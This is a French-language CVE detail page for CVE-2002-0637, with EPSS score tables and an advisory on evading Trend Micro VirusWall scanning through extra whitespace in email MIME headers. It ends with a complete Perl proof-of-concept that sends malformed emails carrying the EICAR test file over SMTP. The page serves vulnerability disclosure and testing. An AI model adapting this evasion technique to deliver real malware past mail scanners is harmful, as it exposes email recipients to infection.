CVE-2002-0637 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	4.19%	–	–
2022-04-03	–	–	4.19%	–	–
2022-07-17	–	–	4.19%	–	–
2023-03-12	–	–	–	1%	–
2023-07-09	–	–	–	1%	–
2024-02-11	–	–	–	1%	–
2024-06-02	–	–	–	1%	–
2024-12-22	–	–	–	0.46%	–
2025-03-09	–	–	–	0.46%	–
2025-01-19	–	–	–	0.46%	–
2025-03-09	–	–	–	0.46%	–
2025-03-18	–	–	–	–	3.22%
2025-03-30	–	–	–	–	3.83%
2025-03-30	–	–	–	–	3.83,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	7%
2022-04-03	86%
2022-07-17	87%
2023-03-12	81%
2023-07-09	82%
2024-02-11	83%
2024-06-02	84%
2024-12-22	75%
2025-03-09	76%
2025-01-19	75%
2025-03-09	76%
2025-03-18	86%
2025-03-30	87%
2025-03-30	87%

source: https://www.securityfocus.com/bid/5259/info A vulnerability has been reported in certain VirusWall versions. Reportedly, it is possible to bypass the scanning mechanism of VirusWall by adding extraneous spaces in certain email HTTP header fields. A malicious email server may add extraneous whitespace in certain email headers. This would cause VirusWall to ignore the malicious email and not scan it. However, many popular email client programs, including Outlook, will ignore this header and display the content regardless. This may allow malicious content to bypass VirusWall and still be interpreted by a client system. #!/usr/bin/perl # The following code generates a malformed email with an EICAR attachment(False Virus). # The vulnerability has been found to be present in TrendMicro's VirusWall, and has been now patched. # Refer to http://solutionbank.antivirus.com/solutions/solutionsearch.asp solution ID 11948 # # BeyondSecurity's SecurITeam, Copyrighted Material, for Testing Purposes only. For more information see: # http://www.securiteam.com/securitynews/5KP000A7QE.html use Getopt::Std; use IO::Socket::INET; getopt('tfhvsb'); if (!$opt_f || !$opt_t || !$opt_h) { print "Usage: malformed_email.pl <-t to> <-f from> <-h smtphost> [-v variant] [-s subject] [-b text]\nVariants:\n(1) Content-Type\n(2) Content Transfer Encoding\n(3) Boundary Space (trailing)\n(4) Boundary Space (prefix)\n"; exit; } $sock = IO::Socket::INET->new(PeerAddr => "$opt_h",PeerPort => '25', Proto => 'tcp'); unless (<$sock> =~ "220") { die "Not a SMTP Server?" } print $sock "HELO you\r\n"; unless (<$sock> =~ "250") { die "HELO failed" } print $sock "MAIL FROM:<$opt_f>\r\n"; unless (<$sock> =~ "250") { die "MAIL FROM failed" } print $sock "RCPT TO:<$opt_t>\r\n"; unless (<$sock> =~ "250") { die "RCPT TO failed" } print $sock "DATA\r\n"; unless (<$sock> =~ "354") { die "DATA failed" } if ($opt_v eq "1") { $content_type = "Content-Type :"; } else { $content_type = "Content-Type:"; } if ($opt_v eq "2") { $content_transfer_encoding = "Content-Transfer-Encoding :"; } else { $content_transfer_encoding = "Content-Transfer-Encoding:"; } if ($opt_v eq "3") { $boundary = "boundary=----=_NextPart_000_000E_01C2100B.F369D840 "; } else { if ($opt_v eq "4") { $boundary = "boundary= ----=_NextPart_000_000E_01C2100B.F369D840"; } else { $boundary = "boundary=\"----=_NextPart_000_000E_01C2100B.F369D840\""; } } print $sock <<EOF; From: $opt_f To: $opt_t Subject: $opt_s MIME-Version: 1.0 $content_type multipart/mixed; $boundary X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 This is a multi-part message in MIME format. ------=_NextPart_000_000E_01C2100B.F369D840 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit $opt_b ------=_NextPart_000_000E_01C2100B.F369D840 $content_type application/x-zip-compressed; name="eicar_com.zip" $content_transfer_encoding base64 Content-Disposition: attachment; filename="eicar_com.zip" UEsDBAoAAAAAAOCYuCg8z1FoRAAAAEQAAAAJAAAAZWljYXIuY29tWDVPIVAlQEFQWzRcUFpYNTQo UF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCpQSwECFAAK AAAAAADgmLgoPM9RaEQAAABEAAAACQAAAAAAAAABACAA/4EAAAAAZWljYXIuY29tUEsFBgAAAAAB AAEANwAAAGsAAAAAAA== ------=_NextPart_000_000E_01C2100B.F369D840-- \n.\n EOF print "Finished sending data\n"; print "Variant #$opt_v\n"; $a = <$sock>; print "$a\n"; close($sock);